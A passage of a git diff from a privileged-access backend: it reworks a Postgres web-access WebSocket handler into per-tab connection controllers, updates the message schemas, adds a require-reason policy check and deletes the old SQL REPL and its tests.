[sessionId=${sessionId}]`); + sendResponse({ + type: PostgresServerMessageType.ConnectionOpenFailed, + id: requestId, + error: msg + }); } finally { - await cancelClient.end().catch(() => {}); + pendingOpens -= 1; } }; - // Sequential message processing to prevent concurrent query issues - let processingPromise = Promise.resolve(); - - socket.on("message", (rawData: Buffer | ArrayBuffer | Buffer[]) => { - const message = parseClientMessage(rawData, PostgresClientMessageSchema); - - // Cancel is handled immediately outside the sequential queue so it can - // interrupt a running query rather than waiting behind it. - if (message?.type === PostgresClientMessageType.Cancel) { - void cancelRunningQuery(); - return; - } - - processingPromise = processingPromise + // Queue a metadata fetch (schemas / tables) behind any in-flight metadata + // call so one-shot pg.Clients don't pile up. Errors are normalised into + // PostgresServerMessageType.Error responses tied to the request id. + const queueMetadata = ( + requestId: string, + fetcher: () => Promise, + onSuccess: (rows: T) => TPostgresCorrelatedServerMessage, + fallbackError: string + ) => { + metadataPromise = metadataPromise .then(async () => { - if (!message) { - sendMessage({ - type: TerminalServerMessageType.Output, - data: "Invalid message format\n", - prompt: repl.getPrompt() + try { + const rows = await fetcher(); + sendResponse(onSuccess(rows)); + } catch (err) { + const { message: errMsg, detail, hint } = toPgErrorFields(err); + sendResponse({ + type: PostgresServerMessageType.Error, + id: requestId, + error: errMsg ?? fallbackError, + detail, + hint }); - return; } + }) + .catch(() => {}); + }; - switch (message.type) { - case PostgresClientMessageType.GetSchemas: { - try { - const query = getSchemasQuery(); - const result = await pgClient.query(query.text, query.values); - sendResponse({ - type: PostgresServerMessageType.Schemas, - id: message.id, - data: result.rows as { name: string }[] - }); - } catch (err) { - await sendQueryError(message.id, err); - } - break; - } - - case PostgresClientMessageType.GetTables: { - try { - const query = getTablesQuery(message.schema); - const result = await pgClient.query(query.text, query.values); - sendResponse({ - type: PostgresServerMessageType.Tables, - id: message.id, - data: result.rows as { name: string; tableType: string }[] - }); - } catch (err) { - await sendQueryError(message.id, err); - } - break; - } - - case PostgresClientMessageType.GetTableDetail: { - try { - const query = getTableDetailQuery(message.schema, message.table); - const result = await pgClient.query<{ result: string }>(query.text, query.values); - const rawDetail = result.rows[0]?.result; - if (!rawDetail) { - sendResponse({ - type: PostgresServerMessageType.Error, - id: message.id, - error: "Table not found or no metadata available" - }); - break; - } - const detail = - typeof rawDetail === "string" - ? (JSON.parse(rawDetail) as Record) - : (rawDetail as unknown as Record); - sendResponse({ - type: PostgresServerMessageType.TableDetail, - id: message.id, - data: detail as { - columns: { - name: string; - type: string; - nullable: boolean; - identityGeneration: string | null; - }[]; - primaryKeys: string[]; - foreignKeys: { - constraintName: string; - columns: string[]; - targetSchema: string; - targetTable: string; - targetColumns: string[]; - }[]; - } - }); - } catch (err) { - await sendQueryError(message.id, err); - } - break; - } - - case PostgresClientMessageType.Query: { - try { - const startTime = performance.now(); - const MAX_ROWS = 1000; - - // Split the SQL into individual statements using the real PostgreSQL C parser - // (via libpg-query WASM). Each statement is then run through a pg-cursor with - // an explicit row cap β€” the server sends at most MAX_ROWS+1 rows at the wire - // level regardless of result set size, so memory usage is bounded. - // eslint-disable-next-line @typescript-eslint/no-unsafe-assignment - const parsed = await parseSql(message.sql); - // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access - const stmtTexts = (parsed.stmts as Array<{ stmt_location?: number; stmt_len?: number }>).map((s) => { - const location = s.stmt_location ?? 0; - return s.stmt_len !== undefined - ? message.sql.slice(location, location + s.stmt_len) - : message.sql.slice(location).trim(); - }); - - let lastRows: Record[] = []; - let lastFields: { name: string }[] = []; - let lastRowCount: number | null = null; - let lastCommand = ""; - let lastIsTruncated = false; - - for (const stmtSql of stmtTexts) { - const cursor = pgClient.query(new Cursor(stmtSql.trim(), null, { types: pgTypes })); - // eslint-disable-next-line no-await-in-loop - const stmtRows = await cursor.read(MAX_ROWS + 1); - const stmtIsTruncated = stmtRows.length > MAX_ROWS; - if (stmtIsTruncated) stmtRows.splice(MAX_ROWS); - // eslint-disable-next-line no-await-in-loop - await cursor.close(); - - // eslint-disable-next-line no-underscore-dangle - const cursorResult = cursor._result; - const cmd = (cursorResult.command ?? "").toUpperCase(); - if (cmd === "BEGIN" || cmd === "START") isInTransaction = true; - if (cmd === "COMMIT" || cmd === "ROLLBACK") isInTransaction = false; - - lastRows = stmtRows; - lastFields = (cursorResult.fields ?? []).map((f) => ({ name: f.name })); - lastRowCount = cursorResult.rowCount; - lastCommand = cursorResult.command ?? ""; - lastIsTruncated = stmtIsTruncated; - } + socket.on("message", (rawData: Buffer | ArrayBuffer | Buffer[]) => { + const message = parseClientMessage(rawData, PostgresClientMessageSchema); + if (!message) return; + + switch (message.type) { + case PostgresClientMessageType.Control: { + if (message.data === "quit") { + sendSessionEnd(SessionEndReason.UserQuit); + onCleanup(); + socket.close(); + } + break; + } - const executionTimeMs = Math.round(performance.now() - startTime); - sendResponse({ - type: PostgresServerMessageType.QueryResult, - id: message.id, - rows: lastRows, - fields: lastFields, - rowCount: lastRowCount, - isTruncated: lastIsTruncated, - transactionOpen: isInTransaction, - command: lastCommand, - executionTimeMs - }); - } catch (err) { - await sendQueryError(message.id, err); - } - break; - } + case PostgresClientMessageType.OpenConnection: { + void openTabConnection(message.id); + break; + } - case PostgresClientMessageType.Control: { - if (message.data === "quit") { - sendSessionEnd(SessionEndReason.UserQuit); - onCleanup(); - socket.close(); - return; - } - if (message.data === "clear-buffer") { - repl.clearBuffer(); - } - break; - } + case PostgresClientMessageType.CloseConnection: { + const controller = controllers.get(message.connectionId); + if (!controller) return; + controllers.delete(message.connectionId); + controller.dispose(); + break; + } - case PostgresClientMessageType.Input: { - const replResult = await repl.processInput(message.data); + case PostgresClientMessageType.Cancel: { + const controller = controllers.get(message.connectionId); + if (!controller || controller.isDisposing()) { + logger.debug( + `Cancel on missing/disposing connection [sessionId=${sessionId}] [connectionId=${message.connectionId}]` + ); + return; + } + controller.handleMessage(message); + break; + } - if (replResult.shouldClose) { - sendSessionEnd(SessionEndReason.UserQuit); - onCleanup(); - socket.close(); - return; - } + case PostgresClientMessageType.GetSchemas: { + queueMetadata( + message.id, + () => fetchSchemasOneShot(oneShotOpts), + (rows) => ({ type: PostgresServerMessageType.Schemas, id: message.id, data: rows }), + "Failed to fetch schemas" + ); + break; + } - sendMessage({ - type: TerminalServerMessageType.Output, - data: replResult.output, - prompt: replResult.prompt - }); - break; - } + case PostgresClientMessageType.GetTables: { + queueMetadata( + message.id, + () => fetchTablesOneShot(oneShotOpts, message.schema), + (rows) => ({ type: PostgresServerMessageType.Tables, id: message.id, data: rows }), + "Failed to fetch tables" + ); + break; + } - default: - break; + case PostgresClientMessageType.GetTableDetail: + case PostgresClientMessageType.Query: { + const controller = controllers.get(message.connectionId); + if (!controller || controller.isDisposing()) { + sendResponse({ + type: PostgresServerMessageType.Error, + id: message.id, + connectionId: message.connectionId, + error: "Connection not found" + }); + return; } - }) - .catch((err) => { - logger.error(err, "Error processing Postgres message"); - sendMessage({ - type: TerminalServerMessageType.Output, - data: "Internal error\n", - prompt: "=> " - }); - }); - }); + controller.handleMessage(message); + break; + } - // Tunnel drop detection - pgClient.on("error", (err) => { - logger.error(err, "Database connection error"); - sendSessionEnd(resolveEndReason(isNearSessionExpiry)); - onCleanup(); - socket.close(); - }); + case PostgresClientMessageType.Activity: { + // No-op. The idle timer is reset by the sibling socket.on("message") + // listener in pam-web-access-service.ts β€” this branch just keeps the + // discriminated-union exhaustive so the `default` arm stays unreachable. + break; + } - pgClient.on("end", () => { - sendSessionEnd(resolveEndReason(isNearSessionExpiry)); - onCleanup(); - socket.close(); + default: + break; + } }); return { cleanup: async () => { - try { - await pgClient.end(); - } catch (err) { - logger.debug(err, "Error closing pg client"); + // dispose() is synchronous and fire-and-forget β€” no await needed. + const snapshot = Array.from(controllers.values()); + controllers.clear(); + for (const controller of snapshot) { + try { + controller.dispose(); + } catch (err) { + logger.debug(err, `Error disposing controller [sessionId=${sessionId}]`); + } } } }; diff --git a/backend/src/ee/services/pam-web-access/pam-postgres-ws-types.ts b/backend/src/ee/services/pam-web-access/pam-postgres-ws-types.ts index bda4395a9e0..3877d8bbc17 100644 --- a/backend/src/ee/services/pam-web-access/pam-postgres-ws-types.ts +++ b/backend/src/ee/services/pam-web-access/pam-postgres-ws-types.ts @@ -1,40 +1,40 @@ import { z } from "zod"; -import { SessionEndReason } from "./pam-web-access-types"; - export enum PostgresClientMessageType { - Input = "input", Control = "control", GetSchemas = "get-schemas", GetTables = "get-tables", GetTableDetail = "get-table-detail", Query = "query", - Cancel = "cancel" + Cancel = "cancel", + OpenConnection = "open-connection", + CloseConnection = "close-connection", + Activity = "activity" } export enum PostgresServerMessageType { - Ready = "ready", - Output = "output", - SessionEnd = "session_end", Schemas = "schemas", Tables = "tables", TableDetail = "table-detail", QueryResult = "query-result", - Error = "error" + Error = "error", + ConnectionOpened = "connection-opened", + ConnectionOpenFailed = "connection-open-failed", + ConnectionClosed = "connection-closed" } -// --- Shared base for correlated request/response messages --- +// --- Shared bases --- const CorrelatedBaseSchema = z.object({ id: z.string().uuid() }); +const TabScopedBaseSchema = CorrelatedBaseSchema.extend({ connectionId: z.string().uuid() }); // ===================================================================== // Client messages (client β†’ server) β€” single flat discriminated union // ===================================================================== -const InputSchema = z.object({ type: z.literal(PostgresClientMessageType.Input), data: z.string() }); - const ControlSchema = z.object({ type: z.literal(PostgresClientMessageType.Control), data: z.string() }); +// Metadata messages β€” not connectionId-scoped; served by one-shot pg.Clients. const GetSchemasRequestSchema = CorrelatedBaseSchema.extend({ type: z.literal(PostgresClientMessageType.GetSchemas) }); @@ -44,46 +44,61 @@ const GetTablesRequestSchema = CorrelatedBaseSchema.extend({ schema: z.string() }); -const GetTableDetailRequestSchema = CorrelatedBaseSchema.extend({ +// Tab-scoped messages β€” carry connectionId; routed to a specific controller. +const GetTableDetailRequestSchema = TabScopedBaseSchema.extend({ type: z.literal(PostgresClientMessageType.GetTableDetail), schema: z.string(), table: z.string() }); -const QueryRequestSchema = CorrelatedBaseSchema.extend({ +const QueryRequestSchema = TabScopedBaseSchema.extend({ type: z.literal(PostgresClientMessageType.Query), sql: z.string().max(50 * 1024) }); -const CancelSchema = z.object({ type: z.literal(PostgresClientMessageType.Cancel) }); +// Cancel stays fire-and-forget; gains connectionId for routing but not id. +const CancelSchema = z.object({ + type: z.literal(PostgresClientMessageType.Cancel), + connectionId: z.string().uuid() +}); + +// Lifecycle β€” open/close tab controllers. +const OpenConnectionSchema = CorrelatedBaseSchema.extend({ + type: z.literal(PostgresClientMessageType.OpenConnection) +}); + +const CloseConnectionSchema = z.object({ + type: z.literal(PostgresClientMessageType.CloseConnection), + connectionId: z.string().uuid() +}); + +// Fire-and-forget heartbeat sent by the FE while the browser tab is visible, so +// the server-side idle timer only fires on truly inactive tabs β€” not on active +// read-only sessions that don't happen to send queries. +const ActivitySchema = z.object({ + type: z.literal(PostgresClientMessageType.Activity) +}); export const PostgresClientMessageSchema = z.discriminatedUnion("type", [ - InputSchema, ControlSchema, GetSchemasRequestSchema, GetTablesRequestSchema, GetTableDetailRequestSchema, QueryRequestSchema, - CancelSchema + CancelSchema, + OpenConnectionSchema, + CloseConnectionSchema, + ActivitySchema ]); export type TPostgresClientMessage = z.infer; // ===================================================================== -// Server messages (server β†’ client) β€” single flat discriminated union +// Server messages (server β†’ client) β€” correlated request/response schemas. +// Lifecycle messages (ready / session_end) travel on the shared +// TerminalServerMessageType channel defined in pam-web-access-types.ts. // ===================================================================== -const OutputSchema = z.object({ - type: z.enum([PostgresServerMessageType.Ready, PostgresServerMessageType.Output]), - data: z.string(), - prompt: z.string().default("") -}); - -const SessionEndSchema = z.object({ - type: z.literal(PostgresServerMessageType.SessionEnd), - reason: z.nativeEnum(SessionEndReason) -}); - const SchemasResponseSchema = CorrelatedBaseSchema.extend({ type: z.literal(PostgresServerMessageType.Schemas), data: z.array(z.object({ name: z.string() })) @@ -94,8 +109,9 @@ const TablesResponseSchema = CorrelatedBaseSchema.extend({ data: z.array(z.object({ name: z.string(), tableType: z.string() })) }); -const TableDetailResponseSchema = CorrelatedBaseSchema.extend({ +const TableDetailResponseSchema = TabScopedBaseSchema.extend({ type: z.literal(PostgresServerMessageType.TableDetail), + transactionOpen: z.boolean(), data: z.object({ columns: z.array( z.object({ @@ -128,7 +144,7 @@ const TableDetailResponseSchema = CorrelatedBaseSchema.extend({ }) }); -const QueryResultResponseSchema = CorrelatedBaseSchema.extend({ +const QueryResultResponseSchema = TabScopedBaseSchema.extend({ type: z.literal(PostgresServerMessageType.QueryResult), rows: z.array(z.record(z.string(), z.unknown())), fields: z.array( @@ -145,28 +161,45 @@ const QueryResultResponseSchema = CorrelatedBaseSchema.extend({ executionTimeMs: z.number() }); +// Error responses carry transactionOpen for tab-scoped errors so the FE banner +// stays in sync after auto-rollback. connectionId is optional because errors +// can come from metadata requests (no connectionId) or unknown-connectionId +// cases tied to a request id. const ErrorResponseSchema = CorrelatedBaseSchema.extend({ type: z.literal(PostgresServerMessageType.Error), + connectionId: z.string().uuid().optional(), + transactionOpen: z.boolean().optional(), error: z.string(), detail: z.string().optional(), hint: z.string().optional() }); -export const PostgresServerMessageSchema = z.discriminatedUnion("type", [ - OutputSchema, - SessionEndSchema, - SchemasResponseSchema, - TablesResponseSchema, - TableDetailResponseSchema, - QueryResultResponseSchema, - ErrorResponseSchema -]); +// Lifecycle responses. +const ConnectionOpenedResponseSchema = CorrelatedBaseSchema.extend({ + type: z.literal(PostgresServerMessageType.ConnectionOpened), + connectionId: z.string().uuid(), + backendPid: z.number().nullable() +}); + +const ConnectionOpenFailedResponseSchema = CorrelatedBaseSchema.extend({ + type: z.literal(PostgresServerMessageType.ConnectionOpenFailed), + error: z.string() +}); + +// Informational β€” BE pushes this when a controller dies outside clean dispose. +const ConnectionClosedResponseSchema = z.object({ + type: z.literal(PostgresServerMessageType.ConnectionClosed), + connectionId: z.string().uuid(), + reason: z.string() +}); -// Correlated server messages only (excludes lifecycle messages like ready/output/session_end) export type TPostgresCorrelatedServerMessage = z.infer< | typeof SchemasResponseSchema | typeof TablesResponseSchema | typeof TableDetailResponseSchema | typeof QueryResultResponseSchema | typeof ErrorResponseSchema + | typeof ConnectionOpenedResponseSchema + | typeof ConnectionOpenFailedResponseSchema + | typeof ConnectionClosedResponseSchema >; diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-repl.test.ts b/backend/src/ee/services/pam-web-access/pam-web-access-repl.test.ts deleted file mode 100644 index a8e6a156942..00000000000 --- a/backend/src/ee/services/pam-web-access/pam-web-access-repl.test.ts +++ /dev/null @@ -1,238 +0,0 @@ -import { beforeEach, describe, expect, it, vi } from "vitest"; - -import { createPamSqlRepl, TQueryExecutor } from "./pam-web-access-repl"; - -describe("createPamSqlRepl", () => { - let queryFn: ReturnType; - let mockExecutor: TQueryExecutor; - let repl: ReturnType; - - beforeEach(() => { - queryFn = vi.fn().mockResolvedValue({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 1 }] - }); - mockExecutor = { query: queryFn }; - repl = createPamSqlRepl(mockExecutor); - }); - - // Statement execution - it("executes complete statement", async () => { - const result = await repl.processInput("SELECT 1;"); - expect(queryFn).toHaveBeenCalledWith("SELECT 1"); - expect(result.output).toContain("1"); - expect(result.prompt).toBe("=> "); - expect(result.shouldClose).toBe(false); - }); - - it("buffers incomplete input", async () => { - const result = await repl.processInput("SELECT *"); - expect(queryFn).not.toHaveBeenCalled(); - expect(result.output).toBe(""); - expect(result.prompt).toBe("-> "); - expect(result.shouldClose).toBe(false); - }); - - it("executes after completing buffered statement", async () => { - await repl.processInput("SELECT *"); - expect(queryFn).not.toHaveBeenCalled(); - - const result = await repl.processInput("FROM users;"); - expect(queryFn).toHaveBeenCalledWith("SELECT *\nFROM users"); - expect(result.prompt).toBe("=> "); - }); - - it("executes multiple statements sequentially", async () => { - queryFn - .mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 1 }] - }) - .mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 2 }] - }); - - const result = await repl.processInput("SELECT 1; SELECT 2;"); - expect(queryFn).toHaveBeenCalledTimes(2); - expect(queryFn).toHaveBeenCalledWith("SELECT 1"); - expect(queryFn).toHaveBeenCalledWith("SELECT 2"); - expect(result.prompt).toBe("=> "); - }); - - // Quit - it("returns shouldClose for \\q", async () => { - const result = await repl.processInput("\\q"); - expect(result.shouldClose).toBe(true); - expect(result.output).toBe("Goodbye!\n"); - expect(queryFn).not.toHaveBeenCalled(); - }); - - it("returns shouldClose for quit", async () => { - const result = await repl.processInput("quit"); - expect(result.shouldClose).toBe(true); - }); - - it("returns shouldClose for exit", async () => { - const result = await repl.processInput("exit"); - expect(result.shouldClose).toBe(true); - }); - - it("treats quit as SQL when buffer non-empty", async () => { - await repl.processInput("SELECT"); - const result = await repl.processInput("quit;"); - expect(result.shouldClose).toBe(false); - expect(queryFn).toHaveBeenCalledWith("SELECT\nquit"); - }); - - // Buffer management - it("clearBuffer resets to empty", async () => { - await repl.processInput("SELECT *"); - expect(repl.getPrompt()).toBe("-> "); - - repl.clearBuffer(); - expect(repl.getPrompt()).toBe("=> "); - }); - - it("getPrompt returns => when buffer empty", () => { - expect(repl.getPrompt()).toBe("=> "); - }); - - it("getPrompt returns -> when buffer has content", async () => { - await repl.processInput("SELECT *"); - expect(repl.getPrompt()).toBe("-> "); - }); - - // Error handling - it("catches query error and returns formatted error", async () => { - queryFn.mockRejectedValueOnce({ - message: 'relation "nonexistent" does not exist' - }); - - const result = await repl.processInput("SELECT * FROM nonexistent;"); - expect(result.output).toContain("ERROR:"); - expect(result.output).toContain("nonexistent"); - expect(result.shouldClose).toBe(false); - expect(result.prompt).toBe("=> "); - }); - - it("continues working after error", async () => { - queryFn.mockRejectedValueOnce({ message: "error" }).mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 1 }] - }); - - await repl.processInput("BAD SQL;"); - const result = await repl.processInput("SELECT 1;"); - expect(result.output).toContain("1"); - expect(result.prompt).toBe("=> "); - }); - - // Empty input - it("re-prompts on empty input with empty buffer", async () => { - const result = await repl.processInput(""); - expect(queryFn).not.toHaveBeenCalled(); - expect(result.prompt).toBe("=> "); - }); - - it("skips empty statements (bare ;)", async () => { - const result = await repl.processInput(";"); - expect(queryFn).not.toHaveBeenCalled(); - expect(result.prompt).toBe("=> "); - }); - - it("handles mixed complete + incomplete on one input", async () => { - queryFn.mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 1 }] - }); - - const result = await repl.processInput("SELECT 1; SELECT"); - expect(queryFn).toHaveBeenCalledTimes(1); - expect(queryFn).toHaveBeenCalledWith("SELECT 1"); - expect(result.prompt).toBe("-> "); - - // Complete the second statement - queryFn.mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 2 }] - }); - - const result2 = await repl.processInput("2;"); - expect(queryFn).toHaveBeenCalledTimes(2); - expect(result2.prompt).toBe("=> "); - }); - - it("DML result formatting", async () => { - queryFn.mockResolvedValueOnce({ - command: "INSERT", - rowCount: 1, - fields: [], - rows: [] - }); - - const result = await repl.processInput("INSERT INTO t VALUES(1);"); - expect(result.output).toBe("INSERT 0 1\n"); - }); - - it("returns error and clears buffer when input exceeds 1 MB limit", async () => { - const oversized = "A".repeat(1024 * 1024 + 1); - const result = await repl.processInput(oversized); - expect(result.output).toContain("buffer size exceeded"); - expect(result.prompt).toBe("=> "); - expect(result.shouldClose).toBe(false); - expect(queryFn).not.toHaveBeenCalled(); - - // REPL should still work after buffer was cleared - queryFn.mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 1 }] - }); - const next = await repl.processInput("SELECT 1;"); - expect(next.output).toContain("1"); - expect(next.prompt).toBe("=> "); - }); - - it("multi-statement paste", async () => { - queryFn - .mockResolvedValueOnce({ - command: "CREATE TABLE", - rowCount: null, - fields: [], - rows: [] - }) - .mockResolvedValueOnce({ - command: "INSERT", - rowCount: 1, - fields: [], - rows: [] - }) - .mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "id", dataTypeID: 23 }], - rows: [{ id: 1 }] - }); - - const result = await repl.processInput("CREATE TABLE t(id int); INSERT INTO t VALUES(1); SELECT * FROM t;"); - expect(queryFn).toHaveBeenCalledTimes(3); - expect(result.output).toContain("CREATE TABLE"); - expect(result.output).toContain("INSERT 0 1"); - expect(result.output).toContain("(1 row)"); - expect(result.prompt).toBe("=> "); - }); -}); diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-repl.ts b/backend/src/ee/services/pam-web-access/pam-web-access-repl.ts deleted file mode 100644 index 47c5bfb9651..00000000000 --- a/backend/src/ee/services/pam-web-access/pam-web-access-repl.ts +++ /dev/null @@ -1,93 +0,0 @@ -import { formatCommandResult, formatError, formatTable } from "./pam-web-access-sql-formatter"; -import { splitStatements } from "./pam-web-access-sql-lexer"; - -/** - * The REPL only depends on this interface, not on pg.Client directly. - * pg.Client satisfies this interface out of the box. - */ -export type TQueryExecutor = { - query(sql: string): Promise<{ - command: string; - rowCount: number | null; - fields: Array<{ name: string; dataTypeID: number }>; - rows: Record[]; - }>; -}; - -export type TPamSqlRepl = ReturnType; - -const MAX_BUFFER_SIZE = 1024 * 1024; // 1 MB - -export const createPamSqlRepl = (queryExecutor: TQueryExecutor) => { - let buffer = ""; - - const executeStatement = async (sql: string): Promise => { - try { - const result = await queryExecutor.query(sql); - - if (result.fields?.length > 0) { - return formatTable(result); - } - return formatCommandResult(result); - } catch (err) { - return formatError(err); - } - }; - - const processInput = async ( - rawInput: string - ): Promise<{ - output: string; - prompt: string; - shouldClose: boolean; - }> => { - // Check for quit commands when buffer is empty - if (buffer.trim().length === 0) { - const trimmed = rawInput.trim(); - if (trimmed === "\\q" || trimmed === "quit" || trimmed === "exit") { - return { output: "Goodbye!\n", prompt: "", shouldClose: true }; - } - } - - // Append input to buffer - if (buffer.length > 0) { - buffer += `\n${rawInput}`; - } else { - buffer = rawInput; - } - - if (buffer.length > MAX_BUFFER_SIZE) { - buffer = ""; - return { - output: "ERROR: buffer size exceeded (1 MB limit). Buffer cleared.\n", - prompt: "=> ", - shouldClose: false - }; - } - - // Split into complete and incomplete statements - const { complete, remainder } = splitStatements(buffer); - buffer = remainder; - - // Execute each complete statement - let output = ""; - for (const stmt of complete) { - const trimmed = stmt.trim(); - if (trimmed.length > 0) { - // eslint-disable-next-line no-await-in-loop - output += await executeStatement(trimmed); - } - } - - const prompt = buffer.trim().length > 0 ? "-> " : "=> "; - return { output, prompt, shouldClose: false }; - }; - - const clearBuffer = () => { - buffer = ""; - }; - - const getPrompt = () => (buffer.trim().length > 0 ? "-> " : "=> "); - - return { processInput, clearBuffer, getPrompt }; -}; diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-service.ts b/backend/src/ee/services/pam-web-access/pam-web-access-service.ts index 2b8d7476744..f3602979027 100644 --- a/backend/src/ee/services/pam-web-access/pam-web-access-service.ts +++ b/backend/src/ee/services/pam-web-access/pam-web-access-service.ts @@ -16,6 +16,8 @@ import { BadRequestError, NotFoundError, PolicyViolationError } from "@app/lib/e import { GatewayProxyProtocol } from "@app/lib/gateway/types"; import { createGatewayConnection, createRelayConnection, setupRelayServer } from "@app/lib/gateway-v2/gateway-v2"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TApprovalPolicyDALFactory } from "@app/services/approval-policy/approval-policy-dal"; import { ApprovalPolicyType } from "@app/services/approval-policy/approval-policy-enums"; import { APPROVAL_POLICY_FACTORY_MAP } from "@app/services/approval-policy/approval-policy-factory"; @@ -33,6 +35,9 @@ import { TUserDALFactory } from "@app/services/user/user-dal"; import { TPamAccountDALFactory } from "../pam-account/pam-account-dal"; import { decryptAccountCredentials } from "../pam-account/pam-account-fns"; +import { TPamAccountPolicyDALFactory } from "../pam-account-policy/pam-account-policy-dal"; +import { PamAccountPolicyRuleType } from "../pam-account-policy/pam-account-policy-enums"; +import { TPolicyRules } from "../pam-account-policy/pam-account-policy-types"; import { TPamResourceDALFactory } from "../pam-resource/pam-resource-dal"; import { decryptResourceConnectionDetails } from "../pam-resource/pam-resource-fns"; import { @@ -64,6 +69,7 @@ const SUPPORTED_WEB_ACCESS_RESOURCES = [PamResource.Postgres, PamResource.SSH, P type TPamWebAccessServiceFactoryDep = { pamAccountDAL: Pick; + pamAccountPolicyDAL: Pick; pamResourceDAL: Pick; permissionService: Pick; auditLogService: Pick; @@ -98,9 +104,11 @@ type THandleWebSocketConnectionDTO = { actorName: string; actorIp: string; actorUserAgent: string; + reason?: string | null; }; export const pamWebAccessServiceFactory = ({ pamAccountDAL, + pamAccountPolicyDAL, pamResourceDAL, permissionService, auditLogService, @@ -160,7 +168,8 @@ export const pamWebAccessServiceFactory = ({ actorEmail, actorName, auditLogInfo, - mfaSessionId + mfaSessionId, + reason }: TIssueWebSocketTicketDTO) => { const account = await pamAccountDAL.findById(accountId); @@ -172,6 +181,12 @@ export const pamWebAccessServiceFactory = ({ throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); } + const trimmedReason = reason?.trim() || null; + + if (!account.resourceId) { + throw new BadRequestError({ message: "Web access is only available for resource-backed accounts" }); + } + const resource = await pamResourceDAL.findById(account.resourceId); if (!resource) { @@ -237,15 +252,32 @@ export const pamWebAccessServiceFactory = ({ ); } + // Reason check is intentionally placed after the approval/permission gates so + // its distinct error code does not leak policy configuration to unauthorized actors. + if (account.policyId) { + const policy = await pamAccountPolicyDAL.findById(account.policyId); + const policyRules = (policy?.rules ?? {}) as TPolicyRules; + if (policy?.isActive && policyRules[PamAccountPolicyRuleType.RequireReason] && !trimmedReason) { + throw new BadRequestError({ + message: "A reason is required to access this account", + name: "PAM_REASON_REQUIRED" + }); + } + } + // MFA check if (account.requireMfa && !mfaSessionId) { - const project = await projectDAL.findById(account.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(account.projectId), () => + projectDAL.findById(account.projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${account.projectId}' not found` }); const actorUser = await userDAL.findById(actor.id); if (!actorUser) throw new NotFoundError({ message: `User with ID '${actor.id}' not found` }); - const org = await orgDAL.findOrgById(project.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(project.orgId), () => + orgDAL.findOrgById(project.orgId) + ); if (!org) throw new NotFoundError({ message: `Organization with ID '${project.orgId}' not found` }); // Determine which MFA method to use @@ -295,7 +327,8 @@ export const pamWebAccessServiceFactory = ({ accountName: account.name, actorEmail, actorName, - auditLogInfo + auditLogInfo, + reason: trimmedReason }) }); @@ -328,7 +361,8 @@ export const pamWebAccessServiceFactory = ({ actorEmail, actorName, actorIp, - actorUserAgent + actorUserAgent, + reason: accessReason }: THandleWebSocketConnectionDTO): Promise => { let session: { id: string } | null = null; let cleanedUp = false; @@ -420,6 +454,10 @@ export const pamWebAccessServiceFactory = ({ throw new BadRequestError({ message: "Invalid account or project" }); } + if (!account.resourceId) { + throw new BadRequestError({ message: "Web access is only available for resource-backed accounts" }); + } + const resource = await pamResourceDAL.findById(account.resourceId); if (!resource) { throw new BadRequestError({ message: "Resource not found" }); @@ -476,7 +514,8 @@ export const pamWebAccessServiceFactory = ({ resourceType: resource.resourceType, accountId: account.id, resourceId: resource.id, - userId + userId, + reason: accessReason?.trim() || null }); await pamSessionExpirationService.scheduleSessionExpiration(session.id, expiresAt); @@ -578,7 +617,8 @@ export const pamWebAccessServiceFactory = ({ accountId, resourceName, accountName, - duration: expiresAt.toISOString() + duration: expiresAt.toISOString(), + reason: accessReason ?? undefined } } }); diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-sql-formatter.test.ts b/backend/src/ee/services/pam-web-access/pam-web-access-sql-formatter.test.ts deleted file mode 100644 index 09e3d72d122..00000000000 --- a/backend/src/ee/services/pam-web-access/pam-web-access-sql-formatter.test.ts +++ /dev/null @@ -1,247 +0,0 @@ -import { builtins } from "pg-types"; -import { describe, expect, it } from "vitest"; - -import { formatCommandResult, formatError, formatTable } from "./pam-web-access-sql-formatter"; - -describe("formatTable", () => { - it("formats a simple two-column result", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 2, - fields: [ - { name: "id", dataTypeID: builtins.INT4 }, - { name: "name", dataTypeID: builtins.TEXT } - ], - rows: [ - { id: 1, name: "Alice" }, - { id: 2, name: "Bob" } - ] - }); - - expect(result).toContain("id"); - expect(result).toContain("name"); - expect(result).toContain("Alice"); - expect(result).toContain("Bob"); - expect(result).toContain("(2 rows)"); - expect(result).toContain("+"); - expect(result).toContain("-"); - }); - - it("right-aligns numeric columns", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 2, - fields: [{ name: "num", dataTypeID: builtins.INT4 }], - rows: [{ num: 1 }, { num: 100 }] - }); - - const lines = result.split("\n"); - // Data rows should have right-aligned numbers - const dataLine1 = lines[2]; // first data row - const dataLine2 = lines[3]; // second data row - // "1" should be padded to width of "100" - expect(dataLine1).toContain(" 1"); - expect(dataLine2).toContain("100"); - }); - - it("handles NULL values as empty strings", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [ - { name: "id", dataTypeID: builtins.INT4 }, - { name: "name", 